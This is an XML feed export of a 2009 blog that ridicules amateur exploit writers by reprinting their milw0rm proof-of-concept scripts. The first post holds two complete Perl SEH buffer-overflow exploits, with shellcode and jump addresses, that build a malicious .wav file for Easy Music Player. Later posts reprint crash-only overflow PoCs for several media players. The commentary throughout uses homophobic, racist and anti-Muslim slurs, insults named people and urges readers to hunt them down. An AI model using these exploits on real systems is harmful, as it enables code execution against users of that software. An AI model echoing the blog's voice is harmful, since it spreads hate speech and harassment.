<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-6109242264951838141</id><updated>2011-07-07T16:43:37.877-07:00</updated><category term='str0ke'/><category term='gay'/><category term='dumb ass'/><category term='the nut goblin'/><category term='seh'/><category term='milw0rm'/><category term='jmp'/><category term='is'/><title type='text'>Exploit Critics</title><subtitle type='html'>This blog hopes to embarrass script kiddies so much that they learn how to actually code shit that resembles an exploit.</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://exploitcritics.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6109242264951838141/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://exploitcritics.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Exploit Critics</name><uri>http://www.blogger.com/profile/16228243081950486779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' src='http://4.bp.blogspot.com/_y6aWq6tGG98/SedSBpiUyrI/AAAAAAAAAAM/K4pINNKyv4A/s1600-R/domenico.jpg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>24</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-6109242264951838141.post-2457580865227962104</id><published>2009-08-11T14:13:00.000-07:00</published><updated>2009-08-11T14:24:27.320-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='seh'/><category scheme='http://www.blogger.com/atom/ns#' term='dumb ass'/><category scheme='http://www.blogger.com/atom/ns#' term='str0ke'/><category scheme='http://www.blogger.com/atom/ns#' term='the nut goblin'/><category scheme='http://www.blogger.com/atom/ns#' term='milw0rm'/><category scheme='http://www.blogger.com/atom/ns#' term='gay'/><category scheme='http://www.blogger.com/atom/ns#' term='jmp'/><category scheme='http://www.blogger.com/atom/ns#' term='is'/><title type='text'>THE GOBLIN STRIKES BACK</title><content type='html'>SHIT! SHIT!&lt;br /&gt;&lt;br /&gt;The Nut Goblin (ThE g0bL!N) has to be the most retarded of the retards we've fucked with on this blog. He is very stupid. Some say he has a negative IQ. Some say he (or she?? once again) has nuts on his/her forehead at all times. But all know what a dumb mother fucking idiot The Nut Goblin really is.&lt;br /&gt;&lt;br /&gt;PUNT! PUNT!&lt;br /&gt;&lt;br /&gt;Exhibit A-Z:&lt;br /&gt;&lt;br /&gt;A perfectly normal exploit.. almost ruined!&lt;br /&gt;&lt;pre&gt;&lt;br /&gt;&lt;pre&gt;#!/usr/bin/perl&lt;br /&gt;# by ahwak2000&lt;br /&gt;# email: 0.w[at]w.cn&lt;br /&gt;# Easy Music Player 1.0.0.2 (wav) Universal Local Buffer Exploit (SEH)&lt;br /&gt;# http://www.otbcode.com/downloads/easymusicsetup.exe&lt;br /&gt;###################################################################&lt;br /&gt;my $shellcode=&lt;br /&gt;"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".&lt;br /&gt;"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".&lt;br /&gt;"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".&lt;br /&gt;"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".&lt;br /&gt;"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".&lt;br /&gt;"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".&lt;br /&gt;"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".&lt;br /&gt;"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".&lt;br /&gt;"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".&lt;br /&gt;"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".&lt;br /&gt;"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".&lt;br /&gt;"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".&lt;br /&gt;"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".&lt;br /&gt;"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".&lt;br /&gt;"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".&lt;br /&gt;"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".&lt;br /&gt;"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".&lt;br /&gt;"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".&lt;br /&gt;"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".&lt;br /&gt;"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".&lt;br /&gt;"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".&lt;br /&gt;"\x4e\x56\x43\x46\x42\x30\x5a";&lt;br /&gt;###################################################################&lt;br /&gt;my $overflow="\x41" x 4128;&lt;br /&gt;my $jmp="\x6F\xBA\x2D\x15";# Universal&lt;br /&gt;my $nop="\x90" x 20;&lt;br /&gt;###################################################################&lt;br /&gt;open(myfile,'&gt;&gt; ahwak2000.wav');&lt;br /&gt;print myfile $overflow.$jmp.$nop.$shellcode;&lt;br /&gt;###################################################################&lt;br /&gt;&lt;/pre&gt;&lt;/pre&gt;&lt;br /&gt;Perfectly fine. JMP to mother fucking code. Now, The cum gobliner has to gay it all up with...&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;pre&gt;#!/usr/bin/perl&lt;br /&gt;# by ThE g0bL!N&lt;br /&gt;#Big thnx: His0k4&lt;br /&gt;#easy Music Player 1.0.0.2(wav)  local  Buffer Overflow Exploit (SEH)&lt;br /&gt;##################################################################&lt;br /&gt;my $bof="\x41" x 4132;&lt;br /&gt;my $nsh="\xEB\x06\x90\x90";&lt;br /&gt;my $seh="\xB8\x15\xC6\x72";&lt;br /&gt;my $nop="\x90" x 20;&lt;br /&gt;my $sec=&lt;br /&gt;"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".&lt;br /&gt;"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".&lt;br /&gt;"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".&lt;br /&gt;"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".&lt;br /&gt;"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".&lt;br /&gt;"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".&lt;br /&gt;"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".&lt;br /&gt;"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".&lt;br /&gt;"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".&lt;br /&gt;"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".&lt;br /&gt;"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".&lt;br /&gt;"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".&lt;br /&gt;"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".&lt;br /&gt;"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".&lt;br /&gt;"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".&lt;br /&gt;"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".&lt;br /&gt;"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".&lt;br /&gt;"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".&lt;br /&gt;"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".&lt;br /&gt;"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".&lt;br /&gt;"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".&lt;br /&gt;"\x4e\x56\x43\x46\x42\x30\x5a";&lt;br /&gt;print $bof.$nsh.$seh.$nop.$sec;&lt;br /&gt;###################################################################&lt;br /&gt;open(myfile,'&gt;&gt; dz.wav');&lt;br /&gt;print myfile $bof.$nsh.$seh.$nop.$sec;&lt;br /&gt;###################################################################&lt;br /&gt;&lt;/pre&gt;&lt;/pre&gt;&lt;br /&gt;Even the fags at milw0rm got it wrong...&lt;br /&gt;&lt;br /&gt;"&lt;a href="http://www.milw0rm.com/exploits/9412" target="_blank" class="style15"&gt;Easy Music Player 1.0.0.2 (wav) Universal Local Buffer Exploit (SEH)&lt;/a&gt;" --&gt; ITS NOT SEH FUCKUP.&lt;br /&gt;&lt;br /&gt;You see a fucking JMP 0xXX anywhere? Debug something every once in a fucking blue moon moron.&lt;br /&gt;&lt;br /&gt;So, milw0rm is dumb and the goblin gobbles str0ke's nuts, and they both claim it as SEH we assume ahahahahahahaahhahaa!!!!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6109242264951838141-2457580865227962104?l=exploitcritics.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://exploitcritics.blogspot.com/feeds/2457580865227962104/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://exploitcritics.blogspot.com/2009/08/goblin-strikes-back.html#comment-form' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6109242264951838141/posts/default/2457580865227962104'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6109242264951838141/posts/default/2457580865227962104'/><link rel='alternate' type='text/html' href='http://exploitcritics.blogspot.com/2009/08/goblin-strikes-back.html' title='THE GOBLIN STRIKES BACK'/><author><name>Exploit Critics</name><uri>http://www.blogger.com/profile/16228243081950486779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' src='http://4.bp.blogspot.com/_y6aWq6tGG98/SedSBpiUyrI/AAAAAAAAAAM/K4pINNKyv4A/s1600-R/domenico.jpg'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6109242264951838141.post-6185074897366679805</id><published>2009-07-11T13:30:00.000-07:00</published><updated>2009-07-11T13:38:24.379-07:00</updated><title type='text'>A DOUBLE ACTION FEATURE FROM THE GOBLIN</title><content type='html'>Main Critism: Do I even have to analyse this shit? IT IS SHIT, YOU CAN SEE THAT.&lt;br /&gt;&lt;br /&gt;I will refer to we and I and I as we.&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;br /&gt; #!/usr/bin/perl&lt;br /&gt;# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ### ## ##&lt;br /&gt;# #   M3U/M3L to ASX/WPL v1.1  (asx,m3u,m3l) Local Stack Overflow POC          ##&lt;br /&gt;# #  Download: http://proletsoft.freeservers.com/mmb/m3utoasx.html             ##&lt;br /&gt;## Welcom Back Milw0rm                                                         ##&lt;br /&gt;# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ### ## ##&lt;br /&gt;my $crash="\x41" x 5000 ;&lt;br /&gt;open(myfile,'&gt;&gt;PoC.m3u');#asx,m3u,m3l)&lt;br /&gt;print myfile $crash;&lt;br /&gt;##################################################################################&lt;br /&gt;#By ThE g0bL!N&lt;br /&gt;# Ismail Fiha seh :) Mada Bik Anta 1st Thotha :)&lt;br /&gt;##################################################################################&lt;br /&gt;&lt;br /&gt;# milw0rm.com [2009-07-11]&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;watttttttttttttttttttttttttttttttttt??????????????????&lt;br /&gt;&lt;pre&gt;&lt;br /&gt; #!/usr/bin/perl&lt;br /&gt;# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ### ## ##&lt;br /&gt;# #   Playlistmaker v1.5   (.M3U/M3L/Txt File) Local Stack Overflow POC        ##&lt;br /&gt;# #  Download: http://proletsoft.freeservers.com/mmb/playlistmaker.html        ##&lt;br /&gt;## Welcom Back Milw0rm                                                         ##&lt;br /&gt;# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ### ## ##&lt;br /&gt;my $crash="\x41" x 5000 ;&lt;br /&gt;open(myfile,'&gt;&gt;PoC.m3u');# M3U/M3L/Txt&lt;br /&gt;print myfile $crash;&lt;br /&gt;##################################################################################&lt;br /&gt;#By ThE g0bL!N&lt;br /&gt;#Usgae:open existing Plylis =&gt; Poc.m3u =&gt; Click On file =&gt; Boom!!!&lt;br /&gt;# Ismail Fiha seh :) Mada Bik Anta 1st Thotha :)&lt;br /&gt;##################################################################################&lt;br /&gt;&lt;br /&gt;# milw0rm.com [2009-07-11]&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;Now that your eye balls are offically bleeeeeeeeeding.. its time to take a time out.&lt;br /&gt;&lt;br /&gt;Gobble on dese ballz goblin!&lt;br /&gt;&lt;br /&gt;Go hunt down these idiots. I'm no fucking racists, but lets burn the towels on their heads. Everybody knows the muslim script kiddies are even worst than the .ro fags now.&lt;br /&gt;&lt;br /&gt;We are now calling on the toothless bitches that these yellow shitting asswipes call their mothers to spank them and ground them from teh interwebz for at least 60 days. During the 60 day period, interwebz access will be restricted to emailing their favorite rappers and compiling exploits remotely via GCC_SERVER. Nothing will stop these dumbasses as we can tell, so theres nothing stopping us from blogging about the dumb shit that they do. Rely on ignorance, spread intelligence.&lt;br /&gt;&lt;br /&gt;BRING BACK MITNICK!!!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6109242264951838141-6185074897366679805?l=exploitcritics.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://exploitcritics.blogspot.com/feeds/6185074897366679805/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://exploitcritics.blogspot.com/2009/07/double-action-feature-from-goblin.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6109242264951838141/posts/default/6185074897366679805'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6109242264951838141/posts/default/6185074897366679805'/><link rel='alternate' type='text/html' href='http://exploitcritics.blogspot.com/2009/07/double-action-feature-from-goblin.html' title='A DOUBLE ACTION FEATURE FROM THE GOBLIN'/><author><name>Exploit Critics</name><uri>http://www.blogger.com/profile/16228243081950486779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' src='http://4.bp.blogspot.com/_y6aWq6tGG98/SedSBpiUyrI/AAAAAAAAAAM/K4pINNKyv4A/s1600-R/domenico.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6109242264951838141.post-8047051783934376074</id><published>2009-07-10T08:50:00.000-07:00</published><updated>2009-07-10T08:56:46.572-07:00</updated><title type='text'>OtsAv TV [.olf] Local Heap Overflow Poc</title><content type='html'>Main Critism: Ok, I'm only gonna post 1/3 "Heap Overflow PoCs".. trust in us, the rest are just as gay.&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;br /&gt;#!/usr/bin/perl&lt;br /&gt;# OtsAv TV [.olf] Local Heap Overflow Poc&lt;br /&gt;# Down : http://www.otsav.com/buy/tv/&lt;br /&gt;# Desc : 2000 A' Heap overflow&lt;br /&gt;# By Mountassif Moad a.k.a Stack&lt;br /&gt;# v4 Team &amp; evil finger&lt;br /&gt;# Open Stack.ofl &gt;&gt; File &gt;&gt;  Import List   &gt;&gt; As playlist  &gt;&gt;&lt;br /&gt;# BOOOOOOOOOOOOOOOOOOOM&lt;br /&gt;# EAX 45454545&lt;br /&gt;# ECX 00009AF0&lt;br /&gt;# EDX 03A0F730&lt;br /&gt;# EBX 0000042A&lt;br /&gt;# ESP 03A0F9C8&lt;br /&gt;# EBP 00000000&lt;br /&gt;# ESI 02CD7102&lt;br /&gt;# EDI 03A0FEAA&lt;br /&gt;# EIP 0043C8D7 OtsAVTVt.0043C8D7&lt;br /&gt;use strict;&lt;br /&gt;use warnings;&lt;br /&gt;my $A= "\x45" x 2000;&lt;br /&gt;open(my $ofl_playlist, "&gt; stack.ofl");&lt;br /&gt;print $ofl_playlist&lt;br /&gt;                    $A.&lt;br /&gt;                    "\r\n";&lt;br /&gt;close $ofl_playlist;&lt;br /&gt;---------------------&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;Wow, that a total retard. "UMMM let meee post dis shiz un seee f s0m3b0dy cun XPLOIT it fer me!!!" --&gt; Really, is that the login you want owning your servers? Is that the kind of moron you listen to but can't understand when you call major technical support hotlines? Will somebody pleaseeee shave this girl's head and sell her back to pre-school or towelhead/dish rag/mop bucket/broom head/microshit education institutes? WOAHHHHHHHHHHHHHH LIKE YEAH D00DZ&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6109242264951838141-8047051783934376074?l=exploitcritics.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://exploitcritics.blogspot.com/feeds/8047051783934376074/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://exploitcritics.blogspot.com/2009/07/otsav-tv-olf-local-heap-overflow-poc.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6109242264951838141/posts/default/8047051783934376074'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6109242264951838141/posts/default/8047051783934376074'/><link rel='alternate' type='text/html' href='http://exploitcritics.blogspot.com/2009/07/otsav-tv-olf-local-heap-overflow-poc.html' title='OtsAv TV [.olf] Local Heap Overflow Poc'/><author><name>Exploit Critics</name><uri>http://www.blogger.com/profile/16228243081950486779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' src='http://4.bp.blogspot.com/_y6aWq6tGG98/SedSBpiUyrI/AAAAAAAAAAM/K4pINNKyv4A/s1600-R/domenico.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6109242264951838141.post-2849157440026036930</id><published>2009-07-10T08:47:00.000-07:00</published><updated>2009-07-10T08:49:58.505-07:00</updated><title type='text'>PatPlayer v3.9 (M3U File) Local Heap Overflow PoC</title><content type='html'>Main critism: You stupid kiddie fucks just won't give up. I hate you more than the new milw0rm owners. Since when is Citrix bug a web bug??&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;br /&gt;#!/usr/bin/perl&lt;br /&gt;#&lt;br /&gt;#&lt;br /&gt;#&lt;br /&gt;# PatPlayer v3.9 (M3U File) Local Heap Overflow PoC&lt;br /&gt;#&lt;br /&gt;#&lt;br /&gt;# Found By : Cyber-Zone (ABDELKHALEK)&lt;br /&gt;#&lt;br /&gt;#&lt;br /&gt;# Greatz : All friends (Jiko :)) Sec-r1z.CoM ..... IQ-TY ....&lt;br /&gt;#&lt;br /&gt;#&lt;br /&gt;#EAX 41414141&lt;br /&gt;#ECX 00000000&lt;br /&gt;#EDX 004F1FC0 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"&lt;br /&gt;#EBX 00B928DC&lt;br /&gt;#ESP 0012FD2C&lt;br /&gt;#EBP 0012FD78&lt;br /&gt;#ESI 004F1CCC ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&lt;br /&gt;#EDI 004EEA78 PatPlaye.004EEA78&lt;br /&gt;#EIP 00404C59 PatPlaye.00404C59&lt;br /&gt;#&lt;br /&gt;my $Header = "#EXTM3U\n";&lt;br /&gt;&lt;br /&gt;my $ex="http://"."A" x 2480; # Random&lt;br /&gt;&lt;br /&gt;open(MYFILE,'&gt;&gt;cyber.m3u');&lt;br /&gt;&lt;br /&gt;print MYFILE $Header.$ex;&lt;br /&gt;&lt;br /&gt;close(MYFILE);&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;Paaaaaaaaaaaaaaaathetic.&lt;br /&gt;&lt;br /&gt;PS. Cyber-Zone nicknamed himself that when he got "In Da Zone" when Cybering with an alaskan huskie. Go figure.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6109242264951838141-2849157440026036930?l=exploitcritics.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://exploitcritics.blogspot.com/feeds/2849157440026036930/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://exploitcritics.blogspot.com/2009/07/patplayer-v39-m3u-file-local-heap.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6109242264951838141/posts/default/2849157440026036930'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6109242264951838141/posts/default/2849157440026036930'/><link rel='alternate' type='text/html' href='http://exploitcritics.blogspot.com/2009/07/patplayer-v39-m3u-file-local-heap.html' title='PatPlayer v3.9 (M3U File) Local Heap Overflow PoC'/><author><name>Exploit Critics</name><uri>http://www.blogger.com/profile/16228243081950486779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' src='http://4.bp.blogspot.com/_y6aWq6tGG98/SedSBpiUyrI/AAAAAAAAAAM/K4pINNKyv4A/s1600-R/domenico.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6109242264951838141.post-3144703251062622581</id><published>2009-07-01T15:47:00.000-07:00</published><updated>2009-07-01T15:50:02.023-07:00</updated><title type='text'>More Lame Shit To Have A Go At</title><content type='html'>Incase you thought we were dead.. or finished.. you thought wrong. We thought wrong. A job done well is never finished we suppose.. and we're back because so goat humping queer decided to jack up some more perl exploit bullshit... yeah, we'd love for a llama to fart on his face too.&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;br /&gt;# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ### ## ##&lt;br /&gt;# #   PEamp 1.02b  (.M3U File) Local Stack Overflow POC                        ##&lt;br /&gt;# #  Download: http://files.brothersoft.com/mp3_audio/players/mp3player.zip    ##&lt;br /&gt;# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ### ## ##&lt;br /&gt;my $chars= "A" x 5000;&lt;br /&gt;my $file="dz.m3u";&lt;br /&gt;open(my $FILE, "&gt;&gt;$file") or die "Cannot open $file: $!";&lt;br /&gt;print $FILE $chars;&lt;br /&gt;close($FILE);&lt;br /&gt;print "$file has been created \n";&lt;br /&gt;# usage: amp.exe=&gt; load playlist =&gt; dz.m3u =&gt; Boom !!! :)&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;h4rh4rh4r Boom !!! like lulz like it crashed my blue screen lulz&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6109242264951838141-3144703251062622581?l=exploitcritics.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://exploitcritics.blogspot.com/feeds/3144703251062622581/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://exploitcritics.blogspot.com/2009/07/more-lame-shit-to-have-go-at.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6109242264951838141/posts/default/3144703251062622581'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6109242264951838141/posts/default/3144703251062622581'/><link rel='alternate' type='text/html' href='http://exploitcritics.blogspot.com/2009/07/more-lame-shit-to-have-go-at.html' title='More Lame Shit To Have A Go At'/><author><name>Exploit Critics</name><uri>http://www.blogger.com/profile/16228243081950486779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' src='http://4.bp.blogspot.com/_y6aWq6tGG98/SedSBpiUyrI/AAAAAAAAAAM/K4pINNKyv4A/s1600-R/domenico.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6109242264951838141.post-8581957299028492716</id><published>2009-05-14T10:12:00.001-07:00</published><updated>2009-05-14T10:15:07.774-07:00</updated><title type='text'>DigiMode Maya 1.0.2 (.m3u / .m3l files) Buffer Overflow PoCs</title><content type='html'>Main critism: SINCE WHEN DID A FUCKING CRASH BECOME A SECURITY BUG?&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;br /&gt;#####################################################################################################&lt;br /&gt;#                    DigiMode Maya 1.0.2 (.M3U File) Local Buffer Overflow PoC&lt;br /&gt;#                 Discovered by SirGod  -  www.mortal-team.net &amp; www.h4cky0u.org&lt;br /&gt;######################################################################################################&lt;br /&gt;my $chars= "A" x 1337;&lt;br /&gt;my $file="sirgod.m3u";&lt;br /&gt;open(my $FILE, "&gt;&gt;$file") or die "Cannot open $file: $!";&lt;br /&gt;print $FILE $chars;&lt;br /&gt;close($FILE);&lt;br /&gt;print "$file was created";&lt;br /&gt;print "SirGod - www.mortal-team.net &amp; www.h4cky0u.org";&lt;br /&gt;&lt;br /&gt;#####################################################################################################&lt;br /&gt;#                    DigiMode Maya 1.0.2 (.M3L File) Local Buffer Overflow PoC&lt;br /&gt;#                 Discovered by SirGod  -  www.mortal-team.net &amp; www.h4cky0u.org&lt;br /&gt;######################################################################################################&lt;br /&gt;my $chars= "A" x 1337;&lt;br /&gt;my $file="sirgod.m3l";&lt;br /&gt;open(my $FILE, "&gt;&gt;$file") or die "Cannot open $file: $!";&lt;br /&gt;print $FILE $chars;&lt;br /&gt;close($FILE);&lt;br /&gt;print "$file was created";&lt;br /&gt;print "SirGod - www.mortal-team.net &amp; www.h4cky0u.org";&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;Somebody obviously gave this bitch turrets when she was too young. She plays with dolls and playlists all day long. I speak for all Canadians by saying, "GO FUCK YOURSELF"&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6109242264951838141-8581957299028492716?l=exploitcritics.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://exploitcritics.blogspot.com/feeds/8581957299028492716/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://exploitcritics.blogspot.com/2009/05/digimode-maya-102-m3u-m3l-files-buffer.html#comment-form' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6109242264951838141/posts/default/8581957299028492716'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6109242264951838141/posts/default/8581957299028492716'/><link rel='alternate' type='text/html' href='http://exploitcritics.blogspot.com/2009/05/digimode-maya-102-m3u-m3l-files-buffer.html' title='DigiMode Maya 1.0.2 (.m3u / .m3l files) Buffer Overflow PoCs'/><author><name>Exploit Critics</name><uri>http://www.blogger.com/profile/16228243081950486779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' 